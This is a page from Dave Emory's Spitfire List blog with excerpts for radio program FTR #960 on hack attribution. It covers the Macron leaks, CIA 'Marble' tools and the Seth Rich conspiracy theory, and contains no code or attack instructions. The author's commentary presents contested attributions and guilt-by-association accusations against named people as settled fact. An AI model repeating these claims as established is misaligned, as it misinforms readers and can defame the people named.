Spitfire List Web site and blog of anti-fascist researcher and radio personality Dave Emory.

For The Record  

FTR #960 Update on the High Profile Hacks

WFMU-FM is podcasting For The Record–You can subscribe to the podcast HERE.

You can subscribe to e-mail alerts from Spitfirelist.com HERE.

You can subscribe to RSS feed from Spitfirelist.com HERE.

You can subscribe to the comments made on programs and posts–an excellent source of information in, and of, itself HERE.

This broadcast was recorded in one, 60-minute segment.

CIA SealIntroduction: As indicated by the title, this broadcast updates the high-profile hacks, at the epicenter of “Russia Gate,” the brutal political fantasy that is at the core of American New Cold War propaganda and that may well lead to World War III.

(Other programs dealing with this subject include: FTR #’s 917, 923, 924, 940, 943, 958, 959.)

As we have noted in many previous broadcasts and posts, cyber attacks are easily disguised. Perpetrating a “cyber false flag” operation is disturbingly easy to do. In a world where the verifiably false and physically impossible “controlled demolition”/Truther nonsense has gained traction, cyber false flag ops are all the more threatening and sinister.

Now, we learn that the CIA’s hacking tools are specifically crafted to mask CIA authorship of the attacks. Most significantly, for our purposes, is the fact that the Agency’s hacking tools are engineered in such a way as to permit the authors of the event to represent themselves as Russian.

This is of paramount significance in evaluating the increasingly neo-McCarthyite New Cold War propaganda about “Russian interference” in the U.S. election.

We then highlight the recent conclusions of the French cyberintelligence chief (Guillaume Poupard) and his warnings about the incredible dangers of cyber-misattribution–the ease with which any random hacker could carrying out a spear-phishing attack, and his bafflement at the NSA’s recent Russian attribution to the spear-phishing French election hacks.

Characteristic of the disingenuous, propagandistic spin of American news media on Putin/Russia/the high profile hacks is a New York Times article that accuses Putin of laying down a propaganda veil to cover for alleged Russian hacking, omitting his remarks that–correctly–note that contemporary technology easily permits the misattribution of cyber espionage/hacking.

Andrew Auerenheimer: Guest at Glenn Greenwald's party; apparent resident of Ukraine; probable author of the phony documents in the Macron hack

Andrew Auerenheimer: Guest at Glenn Greenwald’s party; apparent resident of Ukraine; probable author of the phony documents in the Macron hack

We then review the grotesquely dark comic nature of the Macron hacks (supposedly done by “Russian intelligence”.)

Those “Russian government hackers” really need an OPSEC refresher course. The hacked documents in the “Macron hack” not only contained Cyrillic text in the metadata, but also contained the name of the last person to modify the documents. That name, “Roshka Georgiy Petrovichan”, is an employee at Evrika, a large IT company that does work for the Russian government, including the FSB (Russian intelligence.)

Also found in the metadata is the email of the person who uploaded the files to “archive.org”, and that email address, frankmacher1@gmx.de, is registered with a German free webmail provider used previously in 2016 phishing attacks against the CDU in Germany that have been attributed to APT28. It would appear that the “Russian hackers” not only left clues suggesting it was Russian hackers behind the hack, but they decided name names this time–their own names.

In related news, a group of cybersecurity researchers studying the Macron hack has concluded that the modified documents were doctored by someone associated with The Daily Stormer neo-Nazi website and Andrew “the weev” Auernheimer.

Auerenheimer was a guest at Glenn Greenwald and Laura Poitras’s party celebrating their receipt of the Polk award.

“ ‘We strongly believe that the fake offshore documents were created by someone with control of the Daily Stormer server,” said Tord Lundström, a computer forensics investigator at Virtualroad.org.’ . . .”

The  public face, site publisher of The Daily Stormer is Andrew Anglin. But look who the site is registered to: Andrew Auernheimer (the site architect) who apparently resided in Ukraine as of the start of this year.

The analysis from the web-security firm Virtualroad.org. indicates that someone associated with the Daily Stormer modified those faked documents–very possibly a highly skilled neo-Nazi hacker like “the weev”.

Based on analysis of how the document dump unfolded, it’s looking like the inexplicably self-incriminating “Russian hackers” may have been a bunch of American neo-Nazis. Imagine that.

In FTR #917, we underscored the genesis of the Seth Rich murder conspiracy theory with WikiLeaks and Julian Assange, who was in touch with Roger Stone during the 2016 campaign. (Stone functioned as the unofficial dirty tricks specialist for the Trump campaign, a role he has played–with relish–since Watergate.

The far-right Seth Rich murder conspiracy theory acquired new gravitas, thanks in part to Kim Schmitz, aka “Kim Dotcom.” We examined Schmitz at length in FTR #812. A synoptic overview of the political and professional orientation of Kim Dotcom is excerpted from that broadcast’s description: “A colleague of Eddie the Friendly Spook [Snowden], Julian Assange and Glenn Greenwald, Kim Schmitz, aka “Kim Dotcom”] espouses the same libertarian/free market ideology underlying the “corporatism” of Benito Mussolini. With an extensive criminal record in Germany and elsewhere, “Der Dotcommandant” has eluded serious punishment for his offenses, including executing the largest insider trading scheme in German history.

Embraced by the file-sharing community and elements of the so-called progressive sector, Dotcom actually allied himself with John Banks and his far-right ACT Party in New Zealand. His embrace of the so-called progressive sector came later and is viewed as having damaged left-leaning parties at the polls. Dotcom is enamored of Nazi memorabilia and owns a rare, author-autographed copy of ‘Mein Kampf.’ . . .”

Program Highlights Include:

  • The dissemination of the Seth Rich disinformation by Fox News and Rush Limbaugh, generated by WikiLeaks, Roger Stone and Kim Dotcom.
  • Kim Dotcom’s tweeting of an admittedly phony document about the Seth Rich BS.
  • Dotcom’s refusal to retract his tweet of the phony document.
  • Review of the Shadow Brokers non-hack of the NSA.
  • Review of the Shadow Brokers use of white supremacist propaganda.
  • Review of the role of Crowdstrike’s Dimitri Alperovitch in the dissemination of the “Russia did it” propaganda.
  • Review of the role of Ukrainian fascist Alexandra Chalupa in the dissemination of the “Russia did it” propaganda.

1a. As we have noted in many previous broadcasts and posts, cyber attacks are easily disguised. Perpetrating a “cyber false flag” operation is disturbingly easy to do. In a world where the verifiably false and physically impossible “controlled demolition”/Truther nonsense has gained traction, cyber false flag ops are all the more threatening and sinister.

Now, we learn that the CIA’s hacking tools are specifically crafted to mask CIA authorship of the attacks. Most significantly, for our purposes, is the fact that the Agency’s hacking tools are engineered in such a way as to permit the authors of the event to represent themselves as Russian.

This is of paramount significance in evaluating the increasingly neo-McCarthyite New Cold War propaganda about “Russian interference” in the U.S. election.

“WikiLeaks Vault 7 Part 3 Reveals CIA Tool Might Mask Hacks as Russian, Chinese, Arabic” by Stephanie Dube Dwilson; Heavy; 4/3/2017.

This morning, WikiLeaks released part 3 of its Vault 7 series, called Marble. Marble reveals CIA source code files along with decoy languages that might disguise viruses, trojans, and hacking attacks. These tools could make it more difficult for anti-virus companies and forensic investigators to attribute hacks to the CIA. Could this call the source of previous hacks into question? It appears that yes, this might be used to disguise the CIA’s own hacks to appear as if they were Russian, Chinese, or from specific other countries. These tools were in use in 2016, WikiLeaks reported.

 It’s not known exactly how this Marble tool was actually used. However, according to WikiLeaks, the tool could make it more difficult for investigators and anti-virus companies to attribute viruses and other hacking tools to the CIA. Test examples weren’t just in English, but also Russian, Chinese, Korean, Arabic, and Farsi. This might allow a malware creator to not only look like they were speaking in Russian or Chinese, rather than in English, but to also look like they tried to hide that they were not speaking English, according to WikiLeaks. This might also hide fake error messages or be used for other purposes. . . .

1b. We then review the recent conclusions of the French cyberintelligence chief and his warnings about the incredible dangers of cyber-misattribution–the ease with which any random hacker could carrying out a spear-phishing attack, and his bafflement at the NSA’s recent Russian attribution to the spear-phishing French election hacks.

“French Security Chief Warns of Risk for “Permanent War” in Cyberspace”; CBS News; 06/02/2017

Cyberspace faces an approaching risk of “permanent war” between states and criminal or extremist organizations because of increasingly destructive hacking attacks, the head of the French government’s cybersecurity agency warned Thursday.

In a wide-ranging interview in his office with The Associated Press, Guillaume Poupard lamented a lack of commonly agreed rules to govern cyberspace and said: “We must work collectively, not just with two or three Western countries, but on a global scale.”

“With what we see today – attacks that are criminal, from states, often for espionage or fraud but also more and more for sabotage or destruction – we are getting closer, clearly, to a state of war, a state of war that could be more complicated, probably, than those we’ve known until now,” he said.

His comments echoed testimony from the head of the U.S. National Security Agency, Adm. Michael Rogers, to the Senate Armed Services Committee on May 9. Rogers spoke of “cyber effects” being used by states “to maintain the initiative just short of war” and said: “‘Cyber war’ is not some future concept or cinematic spectacle, it is real and here to stay.”

Poupard said “the most nightmare scenario, the point of view that Rogers expressed and which I share” would be “a sort of permanent war — between states, between states and other organizations, which can be criminal and terrorist organizations — where everyone will attack each other, without really knowing who did what. A sort of generalized chaos that could affect all of cyberspace.

Poupard is director general of the government cyber-defense agency known in France by its acronym, ANSSI. Its agents were immediately called to deal with the aftermath of a hack and massive document leak that hit the election campaign of President Emmanuel Macron just two days before his May 7 victory.

Macron’s political movement said the unidentified hackers accessed staffers’ personal and professional emails and leaked campaign finance material and contracts — as well as fake decoy documents — online.

Contrary to Rogers, who said the U.S. warned France of “Russian activity” before Macron’s win, Poupard didn’t point the finger at Russia. He told the AP that ANSSI’s investigation found no trace behind the Macron hack of the notorious hacking group APT28 — identified by the U.S. government as a Russian intelligence outfit and blamed for hacks of the U.S. election campaign, anti-doping agencies and other targets. The group also is known by other names, including “Fancy Bear.”

Poupard described the Macron campaign hack as “not very technological” and said: “The attack was so generic and simple that it could have been practically anyone.”

Without ruling out the possibility that a state might have been involved, he said the attack’s simplicity “means that we can imagine that it was a person who did this alone. They could be in any country.”

“It really could be anyone. It could even be an isolated individual,” he said.

Poupard contrasted the “Macron Leaks” hack with another far more sophisticated attack that took French broadcaster TV5 Monde off the air in 2015. There, “very specific tools were used to destroy the equipment” in the attack that “resembles a lot what we call collectively APT28,” he said.

“To say ‘Macron Leaks’ was APT28, I’m absolutely incapable today of doing that,” he said. “I have absolutely no element to say whether it is true or false.”

Rogers, the NSA director, said in his Senate Armed Services hearing that U.S. authorities gave their French counterparts “a heads-up” before the Macron documents leaked that: “‘We are watching the Russians. We are seeing them penetrate some of your infrastructure. Here is what we have seen. What can we do to try to assist?’”

Poupard said Rogers’ comments left him perplexed and that the French had long been on alert about potential threats to their presidential election.

“Why did Admiral Rogers say that, like that, at that time? It really surprised me. It really surprised my European allies. And to be totally frank, when I spoke about it to my NSA counterparts and asked why did he say that, they didn’t really know how to reply either,” he said. “Perhaps he went further than what he really wanted to say.”

Still, Poupard said the attack highlighted the cyber-threat to democratic processes. “Unfortunately, we now know the reality that we are going to live with forever, probably,” he said.

The attack on TV5 was a rare public example. In 2016, others targeted government administrations and big companies quoted on the benchmark French stock market index, the CAC-40, he said.

Pointing fingers at suspected authors is fraught with risk, because sophisticated attackers can mask their activities with false trails, he said.

“We suffered attacks that were attributed to China, that we think came from China. Among them, some came from China. China is big, I don’t know if it was the state, criminals,” he said. “What I am certain of is that among these attacks, some strangely resembled Chinese attacks but in fact didn’t come from China.”

“If you start to accuse one country when in fact it was another country … we’ll get international chaos,” he said. “We’ll get what we all fear, which is to say a sort of permanent conflict where everyone is attacking everyone else.”

1c. Mr. Poupard denied the NSA/U.S. assertion that APT28 aka “Cozy Bear/Fancy Bear/Russia” hacked the French election.

“French Cyber Security Leader: No Trace of Russian Hacking Group in Emmanuel Macron Campaign Leaks”; Associated Press; 06/01/2017

The head of the French government’s cyber security agency, which investigated leaks from President Emmanuel Macron’s election campaign, says they found no trace of a notorious Russian hacking group behind the attack.

In an interview in his office Thursday with The Associated Press, Guillaume Poupard said the Macron campaign hack “was so generic and simple that it could have been practically anyone.”

He said they found no trace that the Russian hacking group known as APT28, blamed for other attacks including on the U.S. presidential campaign, was responsible.

Poupard is director general of the government cyber-defense agency known in France by its acronym, ANSSI. Its experts were immediately dispatched when documents stolen from the Macron campaign leaked online on May 5 in the closing hours of the presidential race.

Poupard says the attack’s simplicity “means that we can imagine that it was a person who did this alone. They could be in any country.”

2. A New York Times article by Andrew Higgins (one of the more flagrantly propagandizing NYT writers vis a vis Russia/Ukraine) spins Vladimir Putin’s comments about Russian hacking. Whereas the Times portrayed his comments as “giving an out” to the nonsense about Russia hacking U.S. elections. What the Times eclipsed (along with other U.S. media) was the conclusion of Putin’s comments. He noted that hacking is very easily disguised and misrepresented.

“Maybe Private Russian Hackers Meddled in Election, Putin Says” by Andrew Higgins; The New York Times; 06/01/2017

. . . . An expert at muddying the waters and creating confusion, Mr. Putin advanced a number of alternative theories that could help Moscow address any firm evidence that might emerge as a trail leading to Russia.

Stating that modern technology can easily be manipulated to create a false trail, he said, “I can imagine that someone is doing this purposefully — building the chain of attacks so that the territory of the Russian Federation appears to be the source of that attack.” He added, “Modern technologies allow to do that kind of thing; it’s rather easy to do.”

Mr. Putin appeared to be repeating an argument he first made earlier in the week in an interview with the French newspaper Le Figaro.

“I think that he was totally right when he said it could have been someone sitting on their bed or somebody intentionally inserted a flash drive with the name of a Russian national, or something like that,” Mr. Putin told the French newspaper, referring to Mr. Trump. “Anything is possible in this virtual world. Russia never engages in activities of this kind, and we do not need it. It makes no sense for us to do such things. What for?” . . .

3. Those “Russian government hackers” really need a OPSEC refresher course. The hacked documents in the “Macron hack” not only contained Cyrillic text in the metadata, but also contained the name of the last person to modify the documents. And that name, “Roshka Georgiy Petrovichan”, is an employee at Evrika, a large IT company that does work for the Russian government, including the FSB.

Also found in the metadata is the email of the person who uploaded the files to “archive.org”, and that email address, frankmacher1@gmx.de, is registered with a German free webmail provider used previously in 2016 phishing attacks against the CDU in Germany that have been attributed to APT28. It would appear that the ‘Russian hackers’ not only left clues suggesting it was Russian hackers behind the hack, but they decided name names this time–their own names.

Not surprisingly, given the fascist nature of WikiLeaks, they concluded that Russia was behind the hacks. (For more on the fascist nature of WikiLeaks, see FTR #’s 724, 725, 732, 745, 755, 917.)

“Evidence Suggests Russia Behind Hack of French President-Elect” by Sean Gallagher; Ars Technica; 5/8/2017.

Russian security firms’ metadata found in files, according to WikiLeaks and others.

Late on May 5 as the two final candidates for the French presidency were about to enter a press blackout in advance of the May 7 election, nine gigabytes of data allegedly from the campaign of Emmanuel Macron were posted on the Internet in torrents and archives. The files, which were initially distributed via links posted on 4Chan and then by WikiLeaks, had forensic metadata suggesting that Russians were behind the breach—and that a Russian government contract employee may have falsified some of the dumped documents.

Even WikiLeaks, which initially publicized the breach and defended its integrity on the organization’s Twitter account, has since acknowledged that some of the metadata pointed directly to a Russian company with ties to the government:

#MacronLeaks: name of employee for Russian govt security contractor Evrika appears 9 times in metadata for “xls_cendric.rar” leak archive pic.twitter.com/jyhlmldlbL— WikiLeaks (@wikileaks) May 6, 2017

Evrika (“Eureka”) ZAO is a large information technology company in St. Petersburg that does some work for the Russian government, and the group includes the Federal Security Service of the Russian Federation (FSB) among its acknowledged customers (as noted in this job listing). The company is a systems integrator, and it builds its own computer equipment and provides “integrated information security systems.” The metadata in some Microsoft Office files shows the last person to have edited the files to be “Roshka Georgiy Petrovich,” a current or former Evrika ZAO employee.

According to a Trend Micro report on April 25, the Macron campaign was targeted by the Pawn Storm threat group (also known as “Fancy Bear” or APT28) in a March 15 “phishing” campaign using the domain onedrive-en-marche.fr. The domain was registered by a “Johny Pinch” using a Mail.com webmail address. The same threat group’s infrastructure and malware was found to be used in the breach of the Democratic National Committee in 2016, in the phishing attack targeting members of the presidential campaign of former Secretary of State Hillary Clinton, and in a number of other campaigns against political targets in the US and Germany over the past year.

The metadata attached to the upload of the Macron files also includes some identifying data with an e-mail address for the person uploading the content to archive.org:

Well this is fun pic.twitter.com/oXsH83snCS— Pwn All The Things (@pwnallthethings) May 6, 2017

The e-mail address of the uploader, frankmacher1@gmx.de, is registered with a German free webmail provider used previously in 2016 Pawn Storm / APT28 phishing attacks against the Christian Democratic Union, German Chancellor Angela Merkel’s political party.

The involvement of APT28, the editing of some documents leaked by someone using a Russian version of Microsoft Office, and the attempt to spread the data through amplification in social media channels such as 4Chan, Twitter, and Facebook—where a number of new accounts posted links to the data—are all characteristics of the information operations seen during the 2016 US presidential campaign.

Andrew Auerenheimer: Guest at Glenn Greenwald's party

Andrew Auerenheimer aka “Weev”: Guest at Glenn Greenwald’s party

4. In related news, a group of cybersecurity researchers studying the Macron hack has concluded that the modified documents were doctored by someone associated with The Daily Stormer neo-Nazi website and Andrew “the weev” Auernheimer.

Auerenheimer was a guest at Glenn Greenwald and Laura Poitras’s party celebrating their receipt of the Polk award.

“ ‘We strongly believe that the fake offshore documents were created by someone with control of the Daily Stormer server,” said Tord Lundström, a computer forensics investigator at Virtualroad.org.’ . . .”

Who is in control of the Daily Stormer? Well, its public face and publisher is Andrew Anglin. But look who the site is registered to: Andrew Auernheimer, who apparently resided in Ukraine as of the start of this year:

The analysis from the web-security firm Virtualroad.org. indicates that someone associated with the Daily Stormer modified those faked documents. Like, perhaps a highly skilled neo-Nazi hacker like “the weev”.

Based on an analysis of how the document dump unfolded it’s looking like the inexplicably self-incriminating ‘Russian hackers’ may have been a bunch of American neo-Nazis. Imagine that.

“U.S. Hacker Linked to Fake Macron Documents, Says Cybersecurity Firm” by David Gauthier-Villars; The Wall Street Journal; 5/16/2017.

Ties between an American’s neo-Nazi website and an internet campaign to smear Macron before French election are found

A group of cybersecurity experts has unearthed ties between an American hacker who maintains a neo-Nazi website and an internet campaign to smear Emmanuel Macron days before he was elected president of France.

Shortly after an anonymous user of the 4chan.org discussion forum posted fake documents purporting to show Mr. Macron had set up an undisclosed shell company in the Caribbean, the user directed people to visit nouveaumartel.com for updates on the French election.

That website, according to research by web-security provider Virtualroad.org, is registered by “Weevlos,” a known online alias of Andrew Auernheimer, an American hacker who gained notoriety three years ago when a U.S. appeals court vacated his conviction for computer fraud. The site also is hosted by a server in Latvia that hosts the Daily Stormer, a neo-Nazi news site that identifies its administrator as “Weev,” another online alias of Mr. Aeurnheimer, Virtualroad.org says.

“We strongly believe that the fake offshore documents were created by someone with control of the Daily Stormer server,” said Tord Lundström, a computer forensics investigator at Virtualroad.org.

Through Tor Ekeland, the lawyer who represented him in the computer-fraud case in the U.S., Mr. Auernheimer said he “doesn’t have anything to say.”

A French security official said a probe into the fake documents was looking into the role of far-right and neo-Nazi groups but declined to comment on the alleged role of Mr. Auernheimer.

In the run-up to the French election, cybersecurity agencies warned Mr. Macron’s aides that Russian hackers were targeting his presidential campaign, according to people familiar with the matter. On May 5, nine gigabytes of campaign documents and emails were dumped on the internet. The Macron campaign and French authorities have stopped short of pinning blame for the hack on the Kremlin.

Intelligence and cybersecurity investigators examining the flurry of social-media activity leading up to the hack followed a trail of computer code they say leads back to the American far-right.

Contacted by email over the weekend, the publisher of the Daily Stormer, Andrew Anglin, said he and Mr. Auernheimer had used their news site to write about the fake documents because “We follow 4chan closely and have a more modern editorial process than most sites.”

When asked if he or Mr. Auernheimer were behind the fake documents, Mr. Anglin stopped replying.

Mr. Auernheimer was sentenced to 41 months in prison by a U.S. court in late 2012 for obtaining the personal data of thousands of iPad users through an AT&T website. In April 2014, an appeals court vacated his conviction on the grounds that the venue of the trial, in New Jersey, was improper.

Asked if Mr. Auernheimer resided in Ukraine, as a January post on a personal blog indicates, his lawyer said: “I think this is about right.”

The day after the data dump, French security officials summoned their U.S. counterparts stationed in Paris to formally request a probe of the role American far-right websites might have played in disseminating the stolen data, according to a Western security official. A U.S. security official had no comment.

Mounir Mahjoubi, who was in charge of computer security for Mr. Macron’s campaign said far-right groups, or “an international collective of conservatives,” may have coordinated to disrupt the French election.

“We will take time to do analysis, to deconstruct who really runs these groups,” Mr. Mahjoubi told French radio last week. He couldn’t be reached for comment.

French prosecutors have launched formal probes into both the fake documents and the data dump.

The phony documents intended to smear Mr. Macron were posted to 4chan.org twice by an anonymous user, first on May 3 and again on May 5 using higher-resolution files.

Soon after the second post, several 4chan.org users in the same online conversation below the post appeared to congratulate Mr. Auernheimer.

“Weev… you’re doing the lord’s work,” wrote one of the anonymous users.


That website, according to research by web-security provider Virtualroad.org, is registered by “Weevlos,” a known online alias of Andrew Auernheimer, an American hacker who gained notoriety three years ago when a U.S. appeals court vacated his conviction for computer fraud. The site also is hosted by a server in Latvia that hosts the Daily Stormer, a neo-Nazi news site that identifies its administrator as “Weev,” another online alias of Mr. Aeurnheimer, Virtualroad.org says.

When asked if he or Mr. Auernheimer were behind the fake documents, Mr. Anglin stopped replying.

Asked if Mr. Auernheimer resided in Ukraine, as a January post on a personal blog indicates, his lawyer said: “I think this is about right.”

5. The far-right Seth Rich murder conspiracy theory acquired new gravitas, thanks in part to Kim Schmitz, aka “Kim Dotcom.” We examined Schmitz at length in FTR #812. A synoptic overview of the political and professional orientation of Kim Dotcom is excerpted from that broadcast’s description: “A colleague of Eddie the Friendly Spook [Snowden], Julian Assange and Glenn Greenwald, Kim Schmitz, aka “Kim Dotcom”] espouses the same libertarian/free market ideology underlying the “corporatism” of Benito Mussolini. With an extensive criminal record in Germany and elsewhere, “Der Dotcommandant” has eluded serious punishment for his offenses, including executing the largest insider trading scheme in German history.

Embraced by the file-sharing community and elements of the so-called progressive sector, Dotcom actually allied himself with John Banks and his far-right ACT Party in New Zealand. His embrace of the so-called progressive sector came later and is viewed as having damaged left-leaning parties at the polls. Dotcom is enamored of Nazi memorabilia and owns a rare, author-autographed copy of ‘Mein Kampf.’ . . .”

6. Right-wing media is going to keep biting on Dotcom’s nuggets of ‘testimony’, given its seemingly insatiable appetite for this storyline already and the long-held appetite for seemingly any storyline that promotes the ‘Clinton Body Count’ narrative and portrays Hillary and ‘Killary’.

“The Bonkers Seth Rich Conspiracy Theory, Explained” by Jeff Guo; Vox; 05/24/2017

The life of Seth Rich, a 27-year-old Democratic National Committee staffer, ended nearly a year ago when he was shot to death near his house in Washington, DC. Then came the tragic and bizarre afterlife: Since July, Rich has been the focus of intense right-wing conspiracy theories that have only escalated as the Trump administration’s scandals have deepened.

As the police have repeatedly stated, there is no evidence that Rich’s death was anything other than the consequence of a botched robbery. But some people, especially on the right, believe Rich was murdered by the Clintons for knowing too much about something. The most recent theories claim that Rich, not the Russians, was responsible for leaking the emails, published in WikiLeaks, that revealed Democratic party leaders had talked disparagingly about Bernie Sanders.

Thanks to an erroneous Fox News story last week, which was finally retracted on Tuesday, Rich recently became the focus of an intense media blitz from conservative outlets — many of which were eager for something to talk about besides the scandals swirling around Donald Trump.

Fox News’s Sean Hannity was one of the most enthusiastic rumormongers, devoting segments on three separate occasions last week to Rich. Even after Fox News retracted its story, Hannity promised he would continue to investigate. “I retracted nothing,” he said defiantly on his radio show Tuesday.

Rich’s family has been begging right-wing news outlets to stop spreading unfounded rumors about him, but by now the situation seems to have gotten out of control.

In death, Rich has become a martyr to the right, buoyed by a host of characters each with their own ulterior motives: There is WikiLeaks founder Julian Assange, who wants to downplay the connections between WikiLeaks and the Russians; there are the Clinton haters, who want to spread the idea that the Clintons are murderers; there are the Trump supporters, who want to minimize the idea that Russian hackers helped deliver the election to their candidate; and there are the talking heads on Fox News, who last week needed something other than negative Trump stories to make conversation about.

We might not know who killed Seth Rich, but we do know who turned his legacy into a textbook study of where fake news comes from, how it spreads, and the victims it creates.

Seth Rich was murdered in a senseless act of violence

Seth Rich worked in Democratic politics for most of his career. He grew up and went to college in Omaha, Nebraska, where as a student he volunteered on two Democratic Senate campaigns. After graduating, he moved to Washington, DC, for a job at Greenberg Quinlan Rosner, a progressive opinion research and consulting firm. He was later hired by the Democratic National Committee, where he worked on a project to help people find where to vote.

On Sunday, July 10, Rich was shot to death about a block from where he lived in the Bloomingdale neighborhood of DC. Gunshot detection microphones place the time of the shooting at around 4:20 am. Rich had last been seen at around 1:30 am leaving Lou’s City Bar in Columbia Heights, about a 40-minute walk from where he lived.

It is unclear exactly what happened during those three intervening hours. The Washington Post reported that, according to his parents, cellphone records show that Rich called his girlfriend at 2:05 am and talked to her for more than two hours. He hung up just minutes before he was shot.

The police found Rich on the sidewalk with multiple gunshot wounds, at least two in the back. He still had his watch, his cellphone, and his wallet. There were signs of a struggle: bruises on his hands, knees, and face, and a torn wristwatch strap. According to the police report, he was still “conscious and breathing.” Family members say they were told that Rich was “very talkative,” though it is not publicly known if he was able to describe his assailant or assailants. Rich died a few hours later in the hospital.

The police suspected Rich had been the victim of an attempted robbery. Bloomingdale is a gentrifying part of Washington that still suffers from violent crime. In 2016, there were 24 reported robberies with a gun that occurred within a quarter-mile of the street corner where Rich was shot.

The first conspiracy theories grew out of the “Clinton body count” rumor

Almost immediately after news of Rich’s death, conspiracy theories began circulating on social media. A few factors helped make Rich a target of speculation:

* The murderers left behind Rich’s valuables. (Though, by that same paranoid logic, wouldn’t a professional hitman have taken Rich’s wallet and phone in order to make it look like a regular mugging?)
* Rich worked at the DNC, where in December there had been a minor scandal involving a software glitch that allowed the Bernie Sanders campaign to access private voter data collected by the Clinton campaign.
* Hillary Clinton had just clinched the nomination after a surprisingly bruising primary, and there were still sore feelings in the air.
* There’s a long-running conspiracy theory that the Clintons have assassinated dozens of their political enemies.

If those facts don’t seem to add up to a coherent story, well, you’re thinking too hard. Conspiracy theories don’t operate logically. They start from an assumption — for instance, “the Clintons are shady” — and spiral outward in search of corroboration.

On Reddit, for instance, one user wrote a 1,400-word post listing things that he found “suspicious.” Here were some of the stray facts the redditor claimed were evidence of a hit job by the DNC or the Clintons:

* Rich’s former employer, Greenberg Quinlan Rosner, once did some consulting work for British Petroleum. (“Is it possible that Mr. Rich was aware of the public’s disdain for oil industry/fracking?”)
* Rich once worked on Ben Nelson’s campaign for senator. (“[Nelson] contributed a crucial vote to help pass Obamacare back in 2009.”)
* The political conventions were coming up. (“The TIMING of this tragedy seems too ‘coincidental’”)

It’s unclear what any of these facts have to do with the Clintons, but somehow the Reddit user concluded: “given his position & timing in politics, I believe Seth Rich was murdered by corrupt politicians for knowing too much information on election fraud.”

Others on Twitter and the trolling website 4chan also speculated that Rich might have crossed the Clintons in some way. Rich’s death seemed to fit in with the “Clinton body count” theory, which dates to the 1990s and claims that the Clintons are so vindictive that they hire hitmen to murder people they don’t like.

People who believe the Clintons are murderers often point to deputy White House counsel Vince Foster, who suffered from clinical depression and died of a gunshot wound to the mouth in 1993. Several investigations all ruled Foster’s death a suicide, but some conservatives insisted there must have been foul play. They claimed that Foster, who was looking into the Clintons’ taxes, may have uncovered evidence of corruption in connection to the Whitewater controversy, a guilt-by-association scandal involving friends of the Clintons’.

The “Clinton body count” theory has endured over the years simply because people don’t live forever. Any time someone dies who was connected to the Clintons — and since Bill Clinton was the president of the United States, literally thousands of people were in his orbit — this theory is dredged up again by the tinfoil hat crowd. And then it slowly fades.

At first it seemed the speculation about Seth Rich would die down quickly as well. But then 12 days later, on July 22, WikiLeaks published thousands of private emails from the DNC, and Rich became a politically useful distraction.

Julian Assange and WikiLeaks supercharged the Seth Rich rumors

A month before Rich was murdered, the DNC admitted that Russian hackers had broken into its computer network, gaining access to all of the DNC’s emails. The thought of Russian interference in American politics was infuriating to Rich, according to one person “who was very close” to him, the Washington Post reported: “It was crazy. Especially for Seth. He said, ‘Oh, my God. We have a foreign entity trying to get involved in our elections?’ That made him so angry.”

When WikiLeaks released its dump of DNC emails on July 22, the obvious explanation was that it had obtained those emails from the Russian hackers. This connection was later confirmed by top US intelligence agencies, who concluded “with high confidence” that DNC servers were hacked by top Russian government hackers, who had then given the emails to WikiLeaks. “Moscow most likely chose WikiLeaks because of its self-proclaimed reputation for authenticity,” the US intelligence report explained, as well as for its connection to the Russian propaganda outlet Russia Today.

But WikiLeaks has repeatedly denied its ties to Russia, and ever since last summer it has used Seth Rich as a way to distract from claims that it abetted Russian interference in the US election. WikiLeaks founder Julian Assange had his own reasons to fear a Clinton presidency — as secretary of state, Clinton wanted to indict Assange for his involvement in releasing the millions of US diplomatic cables leaked by Chelsea Manning.

On Dutch television in August 2016, Assange hinted that Rich, not Russia, may have been the source for the WikiLeaks emails. “Whistleblowers go to significant efforts to get us material, and often very significant risks,” he said. “As a 27-year-old, works for the DNC, was shot in the back, murdered just a few weeks ago for unknown reasons as he was walking down the street in Washington.”

“Was he one of your sources then?” the anchor asked.

“We don’t comment on who our sources are,” Assange replied.

“Then why make the suggestion about a young guy being shot in the streets of Washington?” the anchor replied.

Pressed repeatedly for clarification, Assange concluded that “others, others have suggested that. We’re investigating to understand what happened in that situation with Seth Rich. I think it’s a concerning situation; there’s not a conclusion yet.”

As part of its “investigation,” WikiLeaks offered a $20,000 prize in August for information about Rich’s murder.

This is the point where Seth Rich became a prop in a game of international espionage.

Trump supporters and the alt-right amplified the theory that Rich was some kind of Democratic whistleblower or leaker, even though the facts didn’t really fit this pattern. He didn’t have access to the DNC emails, and he had never shown any prowess at hacking — being a data analyst involves a very different set of skills. Besides, the DNC wasn’t the only organization that was hacked: Clinton campaign chair John Podesta’s personal emails, for instance, were stolen separately, as were the emails at the Democratic Congressional Campaign Committee.

Nevertheless, many on the right were inspired by the WikiLeaks insinuations and started to concoct their own conspiracy theories about Rich’s murder. In August, former House speaker and presidential candidate Newt Gingrich told a conservative talk show host that Rich’s death was suspicious. “First of all, of course it’s worth talking about,” he said. “And if Assange says he is the source, Assange may know. That’s not complicated.”

That same month, Trump adviser Roger Stone claimed, without evidence, that Rich was murdered “on his way to meet with the FBI to discuss election fraud.”

To Trump supporters, the claim that Rich had been murdered by the Clintons had twofold appeal: It reinforced the rumor that the Clintons were shady operatives, and it distracted from the mounting evidence that Russia had interfered with the US election — possibly in collusion with the Trump campaign.

In the presidential debate on September 26, Trump famously suggested that it could have been a lone hacker who was responsible for the stolen DNC emails. “It could be Russia, but it could also be China. It could also be lots of other people. It also could be somebody sitting on their bed that weighs 400 pounds,” he said.

Thanks to a weird miscommunication, the conspiracy theory comes back in May

After the election, the conspiracy theories about Seth Rich faded from public consciousness, as the focus turned instead to the FBI’s investigation of connections between Trump staffers and Russian agents. Suspicions still bubbled in right-wing corners of Reddit and on alt-right websites like Gateway Pundit, and Assange continued to claim that it wasn’t the Russians who provided the hacked emails — but most of America had moved on.

But Rich returned to the news last week, when the local TV station FOX 5 DC aired an interview with private investigator Rod Wheeler, who claimed that sources in the FBI told him there was evidence of a connection between Rich and WikiLeaks:

FOX 5 DC: You have sources at the FBI saying that there is information…

WHEELER: For sure…

FOX 5 DC: …that could link Seth Rich to WikiLeaks?

WHEELER: Absolutely. Yeah. That’s confirmed.

Conservative media outlets jumped on the story, which aired the night of Monday, May 15. By Tuesday morning, conservative outlets like Breitbart, the Blaze, and the Daily Caller all had their own pieces relaying Wheeler’s claims.

